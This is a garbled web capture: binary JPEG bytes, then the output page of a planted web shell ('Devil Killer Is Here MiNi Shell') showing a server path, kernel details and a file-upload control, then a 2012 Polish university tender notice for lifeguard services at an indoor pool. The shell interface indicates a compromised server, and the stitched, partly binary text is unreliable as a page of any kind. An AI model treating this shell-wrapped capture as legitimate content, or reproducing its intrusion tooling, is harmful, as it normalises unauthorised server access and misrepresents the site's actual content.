JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/452106-N-2012.html

<p class="kh_header"><b>Wrocław: Kompleksowe świadczenie usług związanych z zabezpieczeniem ratowniczym krytej pływalni Uniwersytetu Przyrodniczego we Wrocławiu przy ul. Chełmońskiego 45 przez okres 2 lat od zawarcia umowy. Sprawa RAP.272.159.2012</b><br>
<b>Numer ogłoszenia: 452106 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe świadczenie usług związanych z zabezpieczeniem ratowniczym krytej pływalni Uniwersytetu Przyrodniczego we Wrocławiu przy ul. Chełmońskiego 45 przez okres 2 lat od zawarcia umowy. Sprawa RAP.272.159.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług związanych z obsługą ratowniczą Krytej Pływalni Uniwersytetu Przyrodniczego we Wrocławiu przy ul. Chełmońskiego 43, w skład której wchodzą:
 basen pływacki o wymiarach: 25,0 m × 12,5 m, 6 torów o głębokości od 1,40 m do 1,80 m
 basen rekreacyjny o nieregularnych kształtach, powierzchnia lustra wody 100,15 m2 i gł. od 0,50 m do 0,90 m

2.Zakres świadczonych usług:
Szczegółowy zakres obowiązków ratownika określa Ustawa o bezpieczeństwie osób przebywających na obszarach wodnych z dnia 18 sierpnia 2011 roku Dz. U. z 2011 r. Nr 208, poz. 1240
3.Do obowiązków wykonawcy usługi ponadto należy:
a)Zapewnienie porządku i bezpieczeństwa osobom przebywającym w obrębie hali basenowej i natrysków.
b)Prowadzenie nadzoru w zakresie, przestrzegania przez osoby korzystające z basenu obowiązującego Regulaminu Pływalni, przepisów BHP i ppoż.
c)Pouczanie grup zorganizowanych oraz osób indywidualnych, zamierzających korzystać z pływalni o obowiązujących przepisach regulaminowych (zakaz spożywania posiłków i napojów w hali basenowej, zakaz biegania, zakaz skoków do wody, zakaz przebywania na hali basenowej osób towarzyszących, rodziców lub opiekunów - nie dotyczy osób niepełnosprawnych).
d)Przestrzeganie obowiązku skorzystania przez grupy zorganizowane jak również osoby indywidualne z kąpieli pod natryskiem, przed wejściem na halę basenową, posiadania czepków kąpielowych i odpowiedniego stroju kąpielowego.
e)Wyznaczanie  na każdej zmianie ratowników - starszego ratownika zmiany i odnotowywanie tego faktu w Dzienniku Pracy Ratowników.
f)Przedłożenia kopii harmonogramu pracy ratowników ( na każdy kolejny miesiąc) do wglądu w recepcji pływalni.
g)Opuszczenie stanowiska może nastąpić wyłącznie na czas przerw regulaminowych, określonych przepisami prawa pracy. W przypadku nagłej konieczności opuszczenie stanowiska, fakt ten musi zostać zgłoszony pracownikowi recepcji pływalni oraz odnotowany przez kierownika zmiany ratowników w Dzienniku pracy ratowników.
h)Udzielanie pierwszej pomocy przedmedycznej, podstawowe opatrzenie ran i urazów, w poważniejszych przypadkach wezwanie Pogotowia Ratunkowego.
i)Przestrzeganie ustalonych godzin rezerwacji torów pływackich lub basenów po zgłoszeniu takiej potrzeby przez pracownika kasy pływalni (ustawienie odpowiednich tablic informacyjnych).
j)Postępowanie zgodnie z regulaminem służby ratowniczej opracowanym przez Wykonawcę usług ratownictwa wodnego i zaakceptowanym przez kierownika pływalni.
k)Utrzymanie porządku w punkcie medycznym i wykorzystywanie tego pomieszczenia wyłącznie do celów służbowych.
l)Nadzór nad ruchem osób w obrębie hali basenowej, szatni, natrysków i trybun.
m)Pomoc w organizacji zajęć grupowych (współpraca z prowadzącymi zajęcia).
n)Obsługa i konserwacja sprzętu basenowego (liny, drabinki, sprzęt sportowy, dydaktyczny i rehabilitacyjny, w tym podnośnik dla niepełnosprawnych).
o)Kontrola warunków kąpieli (woda, powietrze, otoczenie) i rejestrowanie wyników kontroli w dzienniku dyżurów.
p)Prowadzenie dziennika służby ratowniczej.
q)Pełnienie dyżuru przez członków zespołu ratowniczego w strojach ratowniczych zgodnych z decyzją nr 10/10 Prezesa WOPR z dnia 13 kwietnia 2010 roku.
r)Kontrolowanie i sprawdzanie żeby każdy ratownik pełniący dyżur, do zapewnienia bezpieczeństwa osobom kąpiącym się na terenie krytej pływalni, posiadał ważną kartą identyfikacyjną, wydaną przez biuro Zarządu Głównego WOPR (zgodnie z Uchwałą Nr 5/8/VIII/06 Zarządu Głównego WOPR z dnia 23 kwietnia 2006 r. w sprawie ewidencji i kart identyfikacyjnych WOPR).
s)Sterowanie oświetleniem w hali basenowej i dostosowanie go do potrzeb użytkownika oraz wyłączenie zbędnego oświetlenia w wyniku zmiany warunków naturalnych, przerw w zajęciach i ograniczonego wykorzystania obiektu.
t)Rozpoczynanie dyżuru na 15 minut przed otwarciem (w celu przygotowania basenu do zajęć) i kończenie dyżuru 15 minut po zakończeniu godzin pracy pływalni (w celu przygotowania baseny do sprzątania).
u)Zgłaszanie konieczności uzupełnienia sprzętu ratowniczego i medycznego w zależności od potrzeb i terminów ich przydatności do użycia.
v)Zapoznanie się i zatwierdzenie instrukcji bezpieczeństwa na imprezach o charakterze masowym zgodnie z obowiązującymi przepisami bezpieczeństwa oraz regulaminem danej imprezy.
w)Przestrzeganie regulaminów, zarządzeń i innych przepisów wewnętrznych Zamawiającego.
x)Wykonywanie poleceń kierownictwa obiektu (w ramach zakresu obowiązków), a w przypadku przerw w zajęciach, wykonywanie wskazanych czynności porządkowych związanych z przygotowaniem obiektu do zajęć dydaktycznych lub zawodów oraz uporządkowania obiektu po zawodach.
4.Wyżej wymienione usługi realizowane będą przez Wykonawcę w sposób ciągły w czasie pracy pływalni (pkt. 5.), w ilości 2 ratowników w trakcie pełnienia dyżuru, z uprawnieniami kwalifikowanej pierwszej pomocy (w przypadku gdy czynne są 2 niecki basenowe przewiduje się dwa stanowiska ratownicze, a w przypadku gdy czynna jest 1 niecka, tylko jedno stanowisko ratownicze - zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 roku w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz. U. z 2012 r. poz. 108).
5.Ratownicy pełniący służbę muszą posiadać następujące uprawnienia
stopień ratownika wodnego zgodny z zaleceniami Instrukcji Zarządu Głównego WOPR  
aktualne zaświadczenie o ukończeniu kursu i uzyskaniu uprawnień kwalifikowanej pierwszej pomocy 
co najmniej 1000-godzinne doświadczenie każdego z ratowników, w wykonywaniu pracy w charakterze ratownika wodnego,
(stopień ratownika WOPR i starszego ratownika WOPR nadany przed wejściem w życie Uchwały Nr 5/6/09 Prezydium Zarządu Głównego Wodnego Ochotniczego Pogotowia Ratunkowego z dnia 5 grudnia 2009 roku w sprawie stopni ratowników i instruktorów WOPR).
6.Przedmiot zamówienia obejmuje ciągłe świadczenie usług związanych z obsługą ratowniczą w godzinach pracy krytej pływalni:
	Poniedziałek - piątek w godzinach od 7:00 do 22:00
	Sobota i niedziela w godzinach od 8:00 do 22:00
7.Usługi w zakresie ratownictwa muszą być świadczone zgodnie z obowiązującymi przepisami w zakresach określonych Ustawą o bezpieczeństwie osób przebywających na obszarach wodnych z dnia 18 sierpnia 2011 roku Dz. U. z 2011 r. Nr 208, poz. 1240..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie oraz nie dokonuje opisu sposobu oceny ich spełniania, natomiast wykonawca winien złożyć stosowne oświadczenie, ponadto zamawiajacy informuje, że działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli:
W zakresie posiadania wiedzy i doświadczenia Wykonawca wykaże wykonanie 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 1 usługi polegającej na usłudze ratownictwa wodnego o wartości 100.000 netto oraz załączy dokument potwierdzający, że usługi zostały wykonane należycie Jeżeli załączony wykaz wykonanych usług będzie potwierdzać wartość tych usług  w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN według średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane  w Biuletynie Zamówień Publicznych. W przypadku gdy w przedstawionym wykazie wskazane zostaną przez Wykonawcę wartości w walucie innej niż PLN, Zamawiający dokona przeliczenia na PLN według kursu średniego NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie oraz nie dokonuje opisu sposobu oceny ich spełniania, natomiast wykonawca winien złożyć stosowne oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli: Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej 6 osobami   zdolnymi do wykonania zamówienia posiadającymi:
stopień ratownika wodnego zgodny z zaleceniami Instrukcji Zarządu Głównego WOPR,
aktualne zaświadczenia o ukończeniu kursu i uzyskaniu uprawnień kwalifikowanej
pierwszej pomocy,
co najmniej 1000 godzinne doświadczenie każdego z ratowników, w wykonywaniu
pracy w charakterze ratownika wodnego. 
Stopień ratownika WOPR i starszego ratownika WOPR nadany przed wejściem w życie Uchwały nr 5/6/09 Prezydium zarządu Głównego WOPR z dnia 5 grudnia 2009 roku w sprawie stopni ratowników i instruktorów WOPR.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie oraz nie dokonuje opisu sposobu oceny ich spełniania, natomiast wykonawca winien złożyć stosowne oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz ofertowy, 2. oświadczenie o spełnieniu warunków udziału w postępowaniu, 3.podpisany dokument - opi przedmiotu zamówienia- zał. nr 1a 4. ewentualnie pełnomocnictwo. Ponadto w przypadku gdy Wykonawca dla potwierdzenia spełnienia warunku udziału w postępowaniu dotyczącego posiadania wiedzy i doświadczenia, o którym mowa w pkt Roz. IV ust. 2 lit. a SIWZ powołuje się na doświadczenie podmiotu trzeciego i przedstawia posiadane przez ten podmiot referencje, wymagany jest udział tego podmiotu w realizacji zamówienia. W takim przypadku w ofercie należy przedstawić oświadczenie lub inny dokument (w oryginale) tego podmiotu, z którego wynika, że będzie on brał udział w realizacji zamówienia. Dokumenty te Wykonawcy, składający ofertę wspólnie, składają wspólnie.Treść zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązania oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. A w sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.W przypadku, gdy Wykonawca w ofercie powołał się na doświadczenie podmiotu trzeciego przy wykazaniu spełnienia warunku doświadczenia i podmiot ten uczestniczy w realizacji zamówienia jako podwykonawca, niedopuszczalna jest zmiana tego podwykonawcy na etapie realizacji zamówienia. W powyższym przypadku Wykonawca dołączy do oferty pisemne zobowiązanie (w oryginale) podmiotu/-ów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia a wszystkie warunki udziału w postępowaniu, o których mowa w rozdziale V niniejszej SIWZ muszą spełniać łącznie. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (lidera). Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako pełnomocnik pozostałych (liderem). W przypadku złożenia wspólnej oferty przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w rozdziale VI pkt. 1-2 SIWZ. Dokumenty wymienione w rozdziale VI pkt. 3-6 SIWZ podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy podmioty składające wspólną ofertę spełniają je łącznie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub ten podmiot.W przypadku, gdy dokumenty podpisywane są przez osobę reprezentującą Wykonawcę inną niż wskazana w dokumencie rejestracyjnym przedsiębiorcy, do oferty należy dołączyć pełnomocnictwo do: reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być przedstawione w oryginale. Dopuszcza się również złożenie w ofercie kopii pełnomocnictwa notarialnie potwierdzonej za zgodność z oryginałem. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 Rozporządzenia Rady Ministrów z dnia 30 grudnia 2009 r., kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty (tj. inne podmioty o których mowa w art. 26 ust.2b ustawy Pzp). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa: w SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty, o których mowa w rozdziale VI pkt. 8 SIWZ powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Pozostałe dokumenty, o których mowa w rozdziale VI SIWZ, Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza wprowadzenie istotnych zmian do umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:
I.  zmiany terminu wykonania usług:
a)  z przyczyn obiektywnych nie leżących po stronie Wykonawcy,
b) z przyczyn leżących po stronie Zamawiającego,
c) z powodu wystąpienia siły wyższej,
I. a zmiany podwykonawcy
II. zmiany osób reprezentujących wykonawcę lub zamawiającego
III.  zmiana przepisów podatkowych 
a) ustawowa zmiana stawki podatku VAT: Wynagrodzenie należne wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej  na dzień wystawienia faktury (powstania obowiązku podatkowego). W takiej sytuacji nie jest wymagane sporządzenie aneksu do umowy.
IV. warunki dokonywania zmian: 
- inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
- uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
- forma pisemna pod rygorem nieważności w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów, ul. Norwida 25/27, 50-375 Wrocław, budynek główny, pokój 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 10:00, miejsce: sekretariat kanclerza Uniwersytetu Przyrodniczego we Wrocławiu, ul. Norwida 25/27, 50-375 Wrocław, pokój 142.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




